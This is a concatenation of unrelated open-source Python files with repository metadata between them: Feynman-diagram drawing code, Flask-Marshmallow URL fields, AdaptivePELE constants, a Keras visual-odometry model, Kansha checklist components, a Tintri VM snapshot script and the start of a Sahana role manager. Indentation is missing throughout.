size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, sense=1,
curved=False, stems=1, stemsep=0.03):
self.line = line
self.pos = pos
self.displace = pyx.unit.length(displace)
self.length = length
self.size = size
self.angle = angle
self.constriction = constriction
self.sense = sense
self.curved = curved
self.stems = stems
self.stemsep = stemsep
def draw(self, canvas):
"""Draw this arrow on the supplied canvas."""
p = self.line.getPath()
posparam = p.begin() + self.pos * p.arclen()
x, y = self.line.fracpoint(self.pos).getXY()
arrx, arry = self.line.fracpoint(self.pos + self.length / 2.0 / p.arclen()).getXY()
endx, endy = self.line.fracpoint(self.pos - self.length / 2.0 / p.arclen()).getXY()
# Calculate the displacement from the line
displacement = self.displace
intrinsicwidth = pyx.unit.length(0.1)
if hasattr(self.line, "arcradius"):
intrinsicwidth = self.line.arcradius
if displacement > 0:
displacement += intrinsicwidth
else:
displacement -= intrinsicwidth
if config.DEBUG:
print "Displacement = ", displacement
# Position the arrow on the right hand side of lines
tangent = p.tangent(posparam, displacement)
normal = tangent.transformed(pyx.trafo.rotate(90, x, y))
nx, ny = normal.atend()
nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y)
vx, vy = p.atbegin()
vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy)
# If the arrow is on the left, flip it by 180 degrees
if (vxcm * nycm - vycm * nxcm) > 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
if displacement < 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
# Displace the arrow by this normal vector
endx, endy = endx + (nx - x), endy + (ny - y)
arrx, arry = arrx + (nx - x), arry + (ny - y)
if self.sense < 0:
arrx, arry, endx, endy = endx, endy, arrx, arry
if not self.curved:
linepath = pyx.path.path(pyx.path.moveto(endx, endy),
pyx.path.lineto(arrx, arry))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
dist = self.stemsep
n = self.stems
if n > 1: # helicity style arrow
arrowtopath = linepath.split(0.8 * linepath.arclen())[0]
constrictionlen = self.size * self.constriction * \
math.cos(self.angle * math.pi / 360.0)
arrowpath = pyx.deco._arrowhead(arrowtopath,
linepath.arclen(),
1, self.size, 45,
True, constrictionlen)
canvas.fill(arrowpath)
path = pyx.deformer.parallel(-(n + 1) / 2 * dist).deform(arrowtopath)
defo = pyx.deformer.parallel(dist)
for m in range(n):
path = defo.deform(path)
canvas.stroke(path, [])
else: # ordinary (momentum) arrow
canvas.stroke(linepath, styles)
else: # curved arrow (always momentum-style)
curvepiece = self.line.getPath().split([(self.pos*p.arclen()-self.length/2.0),
(self.pos*p.arclen()+self.length/2.0)])
arrpiece = curvepiece[1]
if self.sense < 0:
arrpiece = arrpiece.reversed()
linepath = pyx.deco.decoratedpath(pyx.deformer.parallel(displacement).deform(arrpiece))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
canvas.stroke(linepath.path, styles)
class Label(Visible):
"""General label, unattached to any diagram elements"""
def __init__(self, text, pos=None, x=None, y=None, size=pyx.text.size.normalsize):
self.x, self.y = 0, 0
if x is not None:
self.x = x
if y is not None:
self.y = y
self.size = size
self.text = text
self.textattrs = []
self.pos = pos
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(self.x, self.y, self.text, textattrs)
canvas.insert(t)
class PointLabel(Label):
"""Label attached to points on the diagram"""
def __init__(self, point, text, displace=0.3, angle=0, size=pyx.text.size.normalsize):
self.size = size
self.displace = pyx.unit.length(displace)
self.angle = angle
self.text = text
self.point = point
self.textattrs = []
def getPoint(self):
"""Get the point associated with this label."""
return self.point
def setPoint(self, point):
"""Set the point associated with this label."""
self.point = point
return self
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
x = self.point.getX() + self.displace * math.cos(math.radians(self.angle))
y = self.point.getY() + self.displace * math.sin(math.radians(self.angle))
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs)
canvas.insert(t)
class LineLabel(Label):
"""Label for Feynman diagram lines"""
def __init__(self, line, text, pos=0.5, displace=0.3, angle=0, size=pyx.text.size.normalsize):
self.pos = pos
self.size = size
self.displace = pyx.unit.length(displace)
self.angle = angle
self.text = text
self.line = line
self.textattrs = []
def getLine(self):
"""Get the associated line."""
return self.line
def setLine(self, line):
"""Set the associated line."""
self.line = line
return self
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
p = self.line.getPath()
#x, y = self.line.fracPoint(self.pos).getXY()
posparam = p.begin() + self.pos * p.arclen()
x, y = p.at(posparam)
# Calculate the displacement from the line
displacement = self.displace
intrinsicwidth = pyx.unit.length(0.1)
if hasattr(self.line, "arcradius"):
intrinsicwidth = self.line.arcradius
if displacement > 0:
displacement += intrinsicwidth
else:
displacement -= intrinsicwidth
if config.DEBUG:
print "Displacement = ", displacement
# Position the label on the right hand side of lines
tangent = p.tangent(posparam, displacement)
normal = tangent.transformed(pyx.trafo.rotate(90, x, y))
nx, ny = normal.atend()
nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y)
vx, vy = p.atbegin()
vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy)
# If the label is on the left, flip it by 180 degrees
if (vxcm * nycm - vycm * nxcm) > 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
if displacement < 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
# Displace the label by this normal vector
x, y = nx, ny
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs)
#t.linealign(self.displace,
# math.cos(self.angle * math.pi/180),
# math.sin(self.angle * math.pi/180))
canvas.insert(t)
__all__ = ["Arrow", "FreeArrow", "ParallelArrow", "Label", "PointLabel", "LineLabel"]
| gpl-2.0 | 4,276,754,985,112,377,000 | 38.661184 | 99 | 0.565066 | false |
tranthibaokhanh/thoughtloungev2 | lib/flask_marshmallow_local/fields.py | 1 | 4727 |
# -*- coding: utf-8 -*-
"""
flask_marshmallow.fields
~~~~~~~~~~~~~~~~~~~~~~~~
Custom, Flask-specific fields. See the following link for a list of all available
fields from the marshmallow library.
See http://marshmallow.readthedocs.org/en/latest/api_reference.html#module-marshmallow.fields
"""
import re
import sys
from marshmallow import fields, utils
from marshmallow.exceptions import ForcedError
from flask import url_for
from werkzeug.routing import BuildError
# Py2/3 compatibility
PY2 = sys.version_info[0] == 2
if not PY2:
iteritems = lambda d: iter(d.items())
else:
iteritems = lambda d: d.iteritems()
_tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*')
__all__ = [
'URLFor',
'UrlFor',
'AbsoluteURLFor',
'AbsoluteUrlFor',
'Hyperlinks',
]
def _tpl(val):
"""Return value within ``< >`` if possible, else return ``None``."""
match = _tpl_pattern.match(val)
if match:
return match.groups()[0]
return None
class URLFor(fields.Field):
"""Field that outputs the URL for an endpoint. Acts identically to
Flask's ``url_for`` function, except that arguments can be pulled from the
object to be serialized.
Usage: ::
url = URLFor('author_get', id='<id>')
https_url = URLFor('author_get', id='<id>', _scheme='https', _external=True)
:param str endpoint: Flask endpoint name.
:param kwargs: Same keyword arguments as Flask's url_for, except string
arguments enclosed in `< >` will be interpreted as attributes to pull
from the object.
"""
_CHECK_ATTRIBUTE = False
def __init__(self, endpoint, **kwargs):
self.endpoint = endpoint
self.params = kwargs
fields.Field.__init__(self, **kwargs)
def _format(self, val):
return val
def _serialize(self, value, key, obj):
"""Output the URL for the endpoint, given the kwargs passed to
``__init__``.
"""
param_values = {}
for name, attr_tpl in iteritems(self.params):
attr_name = _tpl(str(attr_tpl))
if attr_name:
attribute_value = utils.get_value(attr_name, obj, default=fields.missing)
if attribute_value is not fields.missing:
param_values[name] = attribute_value
else:
raise ForcedError(AttributeError(
'{attr_name!r} is not a valid '
'attribute of {obj!r}'.format(
attr_name=attr_name, obj=obj,
)))
else:
param_values[name] = attr_tpl
try:
return url_for(self.endpoint, **param_values)
except BuildError as err: # Make sure BuildErrors are raised
raise ForcedError(err)
UrlFor = URLFor
class AbsoluteURLFor(URLFor):
"""Field that outputs the absolute URL for an endpoint."""
def __init__(self, endpoint, **kwargs):
kwargs['_external'] = True
URLFor.__init__(self, endpoint=endpoint, **kwargs)
def _format(self, val):
return val
AbsoluteUrlFor = AbsoluteURLFor
def _rapply(d, func, *args, **kwargs):
"""Apply a function to all values in a dictionary, recursively."""
if isinstance(d, dict):
return {
key: _rapply(value, func, *args, **kwargs)
for key, value in iteritems(d)
}
else:
return func(d, *args, **kwargs)
def _url_val(val, key, obj, **kwargs):
"""Function applied by `HyperlinksField` to get the correct value in the
schema.
"""
if isinstance(val, URLFor):
return val.serialize(key, obj, **kwargs)
else:
return val
class Hyperlinks(fields.Field):
"""Field that outputs a dictionary of hyperlinks,
given a dictionary schema with :class:`URL <flask_marshmallow.fields.URL>`
objects as values.
Example: ::
_links = Hyperlinks({
'self': URL('author', id='<id>'),
'collection': URL('author_list'),
}
})
`URL` objects can be nested within the dictionary. ::
_links = Hyperlinks({
'self': {
'href': URL('book', id='<id>'),
'title': 'book detail'
}
})
:param dict schema: A dict that maps names to
:class:`URL <flask_marshmallow.fields.URL>` endpoints.
"""
_CHECK_ATTRIBUTE = False
def __init__(self, schema, **kwargs):
self.schema = schema
fields.Field.__init__(self, **kwargs)
def _format(self, val):
return val
def _serialize(self, value, attr, obj):
return _rapply(self.schema, _url_val, key=attr, obj=obj)
| mit | 1,358,582,022,125,161,700 | 27.475904 | 97 | 0.57986 | false |
AdaptivePELE/AdaptivePELE | AdaptivePELE/constants/constants.py | 1 | 7191 | from __future__ import absolute_import, division, print_function, unicode_literals
import os
import socket
machine = socket.getfqdn()
print("MACHINE", machine)
if "bsccv" in machine:
PELE_EXECUTABLE = "/data/EAPM/PELE/PELE++/bin/rev12360/Pele_rev12360_mpi"
DATA_FOLDER = "/data/EAPM/PELE/PELE++/data/rev12360/Data"
DOCUMENTS_FOLDER = "/data/EAPM/PELE/PELE++/Documents/rev12360"
PYTHON = "/data2/apps/PYTHON/2.7.5/bin/python2.7"
elif "mn.bsc" in machine:
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/V1.6/build/PELE-1.6_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/V1.6/Documents"
PYTHON = "python"
elif "bsc.mn" in machine:
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/build/PELE-1.6_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/mniv/V1.6/Documents"
elif "bullx" in machine:
# this values are not correct for the minoTauro hardware, just leaving it
# here as a placeholder
PELE_EXECUTABLE = "/gpfs/projects/bsc72/PELE++/nord/rev090518/bin/PELE-1.5_mpi"
DATA_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Data"
DOCUMENTS_FOLDER = "/gpfs/projects/bsc72/PELE++/nord/rev090518/Documents"
elif machine == "bscls309":
PELE_EXECUTABLE = "/home/jgilaber/PELE-repo/bin/PELE-1.6_mpi"
DATA_FOLDER = "/home/jgilaber/PELE-repo/Data"
DOCUMENTS_FOLDER = "/home/jgilaber/PELE-repo/Documents"
else:
PELE_EXECUTABLE = None
DATA_FOLDER = None
DOCUMENTS_FOLDER = None
inputFileTemplate = "{ \"files\" : [ { \"path\" : \"%s\" } ] }"
trajectoryBasename = "*traj*"
class AmberTemplates:
forcefields = {"ff99SB": "oldff/leaprc.ff99SB", "ff14SB": "leaprc.protein.ff14SB"}
antechamberTemplate = "antechamber -i $LIGAND -fi pdb -o $OUTPUT -fo mol2 -c bcc -pf y -nc $CHARGE"
parmchk2Template = "parmchk2 -i $MOL2 -f mol2 -o $OUTPUT"
tleapTemplate = "source $FORCEFIELD\n" \
"source leaprc.gaff\n" \
"source leaprc.water.tip3p\n" \
"$MODIFIED_RES " \
"$LIGANDS " \
"$DUM " \
"$COFACTORS " \
"COMPLX = loadpdb $COMPLEX\n" \
"$BONDS " \
"addions COMPLX Cl- 0\n" \
"addions COMPLX Na+ 0\n" \
"solvatebox COMPLX TIP3PBOX $BOXSIZE\n" \
"saveamberparm COMPLX $PRMTOP $INPCRD\n" \
"savepdb COMPLX $SOLVATED_PDB\n" \
"quit"
DUM_atom = "DUM"
DUM_res = "DUM"
DUM_prep = " 0 0 0\n" \
"\n" \
"------%s--------------\n" \
"%s\n" \
"%s INT 0\n" \
"CHANGE OMIT DU BEG\n" \
" 0.0\n" \
" 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \
" 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \
" 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \
" 4 %s C E 0.00 0.00 0.00 0.00\n" \
"\n" \
"\n" \
"DONE\n" \
"STOP\n" \
"\n" % (DUM_res, DUM_res, DUM_res, DUM_atom)
DUM_cyl_prep = " 0 0 0\n" \
"\n" \
"------%s--------------\n" \
"%s\n" \
"%s INT 0\n" \
"CHANGE OMIT DU BEG\n" \
" 0.0\n" \
" 1 DUMM DU M 0 -1 -2 0.000 0.000 0.000 0.000\n" \
" 2 DUMM DU M 1 0 -1 1.0000 0.0000 0.0000 0.000\n" \
" 3 DUMM DU M 2 1 0 1.0000 90.0000 0.0000 0.000\n" \
" 4 %s C E 0.00 0.00 0.00 0.00\n" \
" 5 %s C E 0.00 0.00 0.00 0.00\n" \
" 6 %s C E 0.00 0.00 0.00 0.00\n" \
"\n" \
"\n" \
"DONE\n" \
"STOP\n" \
"\n" % (DUM_res, DUM_res, DUM_res, DUM_atom, DUM_atom+"B", DUM_atom+"T")
DUM_frcmod = "invented MM atom\n" \
"MASS\n" \
"%s 0.00 0.00\n" \
"\n" \
"NONB\n" \
" %s 0.00 0.00\n" % (DUM_atom, DUM_atom)
DUM_cyl_frcmod = "invented MM atom\n" \
"MASS\n" \
"%s 0.00 0.00\n" \
"%s 0.00 0.00\n" \
"%s 0.00 0.00\n" \
"\n" \
"NONB\n" \
" %s 0.00 0.00\n" \
" %s 0.00 0.00\n" \
" %s 0.00 0.00\n" % (DUM_atom, DUM_atom+"B", DUM_atom+"T", DUM_atom, DUM_atom+"B", DUM_atom+"T")
trajectoryTemplate = "trajectory_%d.%s"
CheckPointReporterTemplate = "checkpoint_%d.chk"
class OutputPathConstants():
"""
Class with constants that depend on the outputPath
"""
def __init__(self, outputPath):
self.originalControlFile = ""
self.epochOutputPathTempletized = ""
self.clusteringOutputDir = ""
self.clusteringOutputObject = ""
self.equilibrationDir = ""
self.tmpInitialStructuresTemplate = ""
self.tmpControlFilename = ""
self.tmpInitialStructuresEquilibrationTemplate = ""
self.tmpControlFilenameEqulibration = ""
self.topologies = ""
self.allTrajsPath = ""
self.MSMObjectEpoch = ""
self.buildConstants(outputPath)
def buildConstants(self, outputPath):
self.buildOutputPathConstants(outputPath)
self.tmpFolder = "tmp_" + outputPath.replace("/", "_")
self.buildTmpFolderConstants(self.tmpFolder)
def buildOutputPathConstants(self, outputPath):
self.originalControlFile = os.path.join(outputPath, "originalControlFile.conf")
self.epochOutputPathTempletized = os.path.join(outputPath, "%d")
self.clusteringOutputDir = os.path.join(self.epochOutputPathTempletized, "clustering")
self.clusteringOutputObject = os.path.join(self.clusteringOutputDir, "object.pkl")
self.MSMObjectEpoch = os.path.join(self.epochOutputPathTempletized, "MSM_object.pkl")
self.topologies = os.path.join(outputPath, "topologies")
self.equilibrationDir = os.path.join(outputPath, "equilibration")
self.allTrajsPath = os.path.join(outputPath, "allTrajs")
def buildTmpFolderConstants(self, tmpFolder):
self.tmpInitialStructuresTemplate = tmpFolder+"/initial_%d_%d.pdb"
self.tmpInitialStructuresEquilibrationTemplate = tmpFolder+"/initial_equilibration_%d.pdb"
self.tmpControlFilename = tmpFolder+"/controlFile%d.conf"
self.tmpControlFilenameEqulibration = tmpFolder+"/controlFile_equilibration_%d.conf"
md_supported_formats = set(["xtc", "dcd"])
formats_md_string = ", ".join(md_supported_formats)
| mit | -6,549,988,297,967,724,000 | 42.05988 | 129 | 0.522459 | false |
ksu-mechatronics-research/deep-visual-odometry | models/hand_crafted/alexnet_inspired/alexNet_14q/alexnet14.py | 1 | 2703 | # The Model of DeepVO
from keras.layers import Input
from keras.layers.core import Dense, Dropout, Activation, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers.advanced_activations import PReLU
from keras import backend as K #enable tensorflow functions
#AlexNet with batch normalization in Keras
#input image is 128x128
def create_model():
"""
This model is designed to take in images and give multiple outputs.
Here is what the network was designed for:
Inputs:
128x128X6 RGB images stacked (RGBRGB)
Outputs:
Translation between two images
Rotation between images in quaternion form
"""
input_img = Input(shape=(128, 128, 6), name='input_img')
x = Convolution2D(96, 11, 11, border_mode='same')(input_img)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(11, 11), strides=(5, 5), border_mode='same')(x)
x = Convolution2D(384, 3, 3, border_mode='same')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(3, 3), strides=(3, 3), border_mode='same')(x)
x = Flatten()(x)
x = Dense(4096, init='normal')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
x = Dense(4096, init='normal')(x)
x = BatchNormalization()(x)
x = Activation('relu')(x)
# Delta Translation output
translation_proc = Dense(3, init='normal')(x)
vector_translation = Activation(PReLU(), name='translation')(translation_proc)
# Delta rotation in quaternion form
rotation_proc = Dense(64, activation='relu')(x)
rotation_proc = Dense(64, activation='relu')(rotation_proc)
rotation_proc = Dense(64, activation='relu')(rotation_proc)
rotation_proc = Dense(4, activation='tanh')(rotation_proc)
quaternion_rotation = Lambda(normalize_quaternion, name='rotation')(rotation_proc)
model = Model(input=input_img, output=[vector_translation, quaternion_rotation])
return model
def normalize_quaternion(x):
"Use tensorflow normalize function on this layer to ensure valid quaternion rotation"
x = K.l2_normalize(x, axis=1)
return x
def train_model(model, Xtr, Ytr, Xte, Yte, save_path=None):
"Note: y should be [[translation],[quat rotation]]"
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_absolute_error'])
history = model.fit(Xtr, Ytr, validation_split=0.2, batch_size=8, nb_epoch=30, verbose=1)
score = model.evaluate(Xte, Yte, verbose=1)
if save_path:
model.save(save_path)
return score, history
| mit | -4,285,629,334,953,081,000 | 32.37037 | 95 | 0.691454 | false |
droodle/kansha | kansha/checklist/comp.py | 1 | 5840 | # --
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
# --
from nagare import component, database, security
import json
from kansha.title import comp as title
from kansha import notifications
from models import DataChecklist, DataChecklistItem
class NewChecklistItem(object):
def __init__(self):
self.focus = False
class ChecklistTitle(title.Title):
model = DataChecklist
field_type = 'input'
class ChecklistItemTitle(title.Title):
model = DataChecklistItem
field_type = 'input'
class ChecklistItem(object):
def __init__(self, id_, data=None):
self.id = id_
data = data if data is not None else self.data
self.title = component.Component(ChecklistItemTitle(self))
self.title.on_answer(lambda v: self.title.call(model='edit' if not self.title.model else None))
self.done = data.done
@property
def data(self):
return DataChecklistItem.get(self.id)
def get_title(self):
return self.data.title
def set_title(self, title):
self.data.title = title
def set_done(self):
'''toggle done status'''
self.data.done = self.done = not self.done
item = self.data
data = {'item': self.get_title(),
'list': item.checklist.title,
'card': item.checklist.card.title}
notifications.add_history(item.checklist.card.column.board,
item.checklist.card,
security.get_user().data,
u'card_listitem_done' if self.done else u'card_listitem_undone',
data)
class Checklist(object):
def __init__(self, id_, data=None):
self.id = id_
data = data if data is not None else self.data
self.items = [component.Component(ChecklistItem(item.id, item)) for item in data.items]
self.title = component.Component(ChecklistTitle(self))
self.title.on_answer(self.handle_answer)
self.new_item = component.Component(NewChecklistItem())
self.new_item.on_answer(self.add_item)
def handle_answer(self, v):
if v and self.title.model:
self.new_title(v)
self.title.call(model='edit' if not self.title.model else None)
def edit_title(self):
self.title.becomes(model='edit')
def reorder_items(self):
for i, item in enumerate(self.data.items):
item.index = i
def add_item(self, text):
if text is None or not text.strip():
return
item = DataChecklistItem(checklist=self.data, title=text.strip(), index=len(self.data.items))
database.session.flush()
item = component.Component(ChecklistItem(item.id, item))
self.items.append(item)
self.reorder_items()
self.new_item().focus = True
def delete_item(self, index):
item = self.items.pop(index)()
item.data.delete()
self.reorder_items()
def get_title(self):
return self.data.title
def set_title(self, title):
self.data.title = title
def set_index(self, index):
self.data.index = index
@property
def total_items(self):
return len(self.items)
@property
def nb_items(self):
return len([item for item in self.items if item().done])
@property
def progress(self):
if not self.items:
return 0
return self.nb_items * 100 / self.total_items
@property
def data(self):
return DataChecklist.get(self.id)
def new_title(self, title):
cl = self.data
data = {'list': title, 'card': cl.card.title}
notifications.add_history(cl.card.column.board,
cl.card,
security.get_user().data,
u'card_add_list',
data)
class Checklists(object):
def __init__(self, card):
self.parent = card
self.checklists = [component.Component(Checklist(clist.id, clist)) for clist in card.data.checklists]
@property
def nb_items(self):
return sum([cl().nb_items for cl in self.checklists])
@property
def total_items(self):
return sum([cl().total_items for cl in self.checklists])
def delete_checklist(self, index):
cl = self.checklists.pop(index)()
for i in range(index, len(self.checklists)):
self.checklists[i]().set_index(i)
data = {'list': cl.get_title(), 'card': self.parent.get_title()}
cl.data.delete()
if data['list']:
notifications.add_history(self.parent.column.board.data,
self.parent.data,
security.get_user().data,
u'card_delete_list',
data)
def add_checklist(self):
clist = DataChecklist(card=self.parent.data)
database.session.flush()
ck = Checklist(clist.id, clist)
ck.edit_title()
ck.set_index(len(self.checklists))
self.checklists.append(component.Component(ck))
def reorder(self, ids):
"""Reorder checklists
In:
- ``ids`` -- checklist ids
"""
new_order = []
i = 0
for cl_id in json.loads(ids):
id_ = int(cl_id.split('_')[-1])
for cl in self.checklists:
if cl().id == id_:
cl().set_index(i)
i += 1
new_order.append(cl)
self.checklists = new_order
| bsd-3-clause | -5,212,961,767,522,489,000 | 29.103093 | 109 | 0.568151 | false |
Tintri/tintri-api-examples | snapshot_vm.py | 1 | 5628 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2016 Tintri, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
import json
import datetime
import tintri_1_1 as tintri
"""
This Python script takes a snapshot for the specified VM.
"""
# For exhaustive messages on console, make it to True; otherwise keep it False
debug_mode = False
def print_with_prefix(prefix, out):
print(prefix + out)
return
def print_debug(out):
if debug_mode:
print_with_prefix("[DEBUG] : ", out)
return
def print_info(out):
print_with_prefix("[INFO] : ", out)
return
def print_error(out):
print_with_prefix("[ERROR] : ", out)
return
# Take a manual snapshot.
def take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id):
snapshot_spec = {
'typeId' : "com.tintri.api.rest.v310.dto.domain.beans.snapshot.SnapshotSpec",
'consistency' : consistency_type,
'retentionMinutes' : 240, # 4 hours
'snapshotName' : snapshot_name,
'sourceVmTintriUUID' : vm_uuid }
# The API needs a list of snapshot specifications.
snapshot_specs = [snapshot_spec]
ss_url = "/v310/snapshot"
r = tintri.api_post(server_name, ss_url, snapshot_specs, session_id)
if (r.status_code != 200):
msg = "The HTTP response for the post invoke to the server is " + \
server_name + "not 200, but is: " + str(r.status_code) + "."
raise tintri.TintriApiException(msg, r.status_code, vm_url, str(snapshot_specs), r.text)
print_debug("The JSON response of the post invoke to the server " +
server_name + " is: " + r.text)
# The result is a liset of snapshot UUIDs.
snapshot_result = r.json()
print_info(snapshot_name + ": " + snapshot_result[0])
return
# main
if len(sys.argv) < 5:
print("\nSnapshot a VM.\n")
print("Usage: " + sys.argv[0] + " server_name user_name password vm_name [consistency type]\n")
print(" consistency type can be 'crash' or 'vm'. The default is 'crash'.")
sys.exit(-1)
server_name = sys.argv[1]
user_name = sys.argv[2]
password = sys.argv[3]
vm_name = sys.argv[4]
if (len(sys.argv) == 6):
consistency_type = sys.argv[5]
else:
consistency_type = "crash"
try:
# Confirm the consistency type.
if (consistency_type == "crash"):
consistency_type = "CRASH_CONSISTENT"
elif (consistency_type == "vm"):
consistency_type = "VM_CONSISTENT"
else:
raise tintri.TintriRequestException("consistency_type is not 'crash' or 'vm': " + consistency_type)
# Get the preferred version
r = tintri.api_version(server_name)
json_info = r.json()
print_info("API Version: " + json_info['preferredVersion'])
# Login to VMstore or TGC
session_id = tintri.api_login(server_name, user_name, password)
except tintri.TintriRequestsException as tre:
print_error(tre.__str__())
sys.exit(-10)
except tintri.TintriApiException as tae:
print_error(tae.__str__())
sys.exit(-11)
try:
# Create query filter to get the VM specified by the VM name.
q_filter = {'name': vm_name}
# Get the UUID of the specified VM
vm_url = "/v310/vm"
r = tintri.api_get_query(server_name, vm_url, q_filter, session_id)
print_debug("The JSON response of the get invoke to the server " +
server_name + " is: " + r.text)
vm_paginated_result = r.json()
num_vms = int(vm_paginated_result["filteredTotal"])
if num_vms == 0:
raise tintri.TintriRequestsException("VM " + vm_name + " doesn't exist")
# Get the information from the first item and hopefully the only item.
items = vm_paginated_result["items"]
vm = items[0]
vm_name = vm["vmware"]["name"]
vm_uuid = vm["uuid"]["uuid"]
print_info(vm_name + ": " + vm_uuid)
# Get the time for the snapshot description.
now = datetime.datetime.now()
now_sec = datetime.datetime(now.year, now.month, now.day,
now.hour, now.minute, now.second)
snapshot_name = vm_name + now_sec.isoformat()
# Take a manual snapshot.
take_snapshot(vm_uuid, snapshot_name, consistency_type, server_name, session_id)
# All pau, log out.
tintri.api_logout(server_name, session_id)
except tintri.TintriRequestsException as tre:
print_error(tre.__str__())
tintri.api_logout(server_name, session_id)
sys.exit(-20)
except tintri.TintriApiException as tae:
print_error(tae.__str__())
tintri.api_logout(server_name, session_id)
sys.exit(-21)
| mit | -2,311,016,554,236,844,000 | 31.344828 | 107 | 0.663468 | false |
flavour/eden | modules/s3/s3roles.py | 1 | 73907 | # -*- coding: utf-8 -*-
""" S3 User Roles Management
@copyright: 2018-2019 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3RoleManager",
)
import uuid
import json
#import sys
from gluon import current, URL, DIV, SPAN, SQLFORM, INPUT, A, LI, UL
from s3compat import StringIO, long
from s3dal import Field
from .s3crud import S3CRUD
from .s3rest import S3Method
from .s3query import FS
from .s3utils import s3_str, s3_mark_required
from .s3validators import JSONERRORS
from .s3widgets import s3_comments_widget
from .s3xml import SEPARATORS
# =============================================================================
class S3RoleManager(S3Method):
""" REST Method to manage user roles and permission rules """
# -------------------------------------------------------------------------
def apply_method(self, r, **attr):
"""
Entry point for REST interface.
@param r: the S3Request instance
@param attr: controller attributes
"""
method = self.method
tablename = self.tablename
auth = current.auth
sr = auth.get_system_roles()
output = {}
if tablename == "auth_group": # through admin/role controller
# Only ADMIN can manipulate roles
if not auth.s3_has_role(sr.ADMIN):
r.unauthorised()
if method == "list":
output = self.role_list(r, **attr)
elif method in ("read", "create", "update"):
output = self.role_form(r, **attr)
elif method == "copy":
output = self.copy_role(r, **attr)
elif method == "delete":
output = self.delete_role(r, **attr)
elif method == "users":
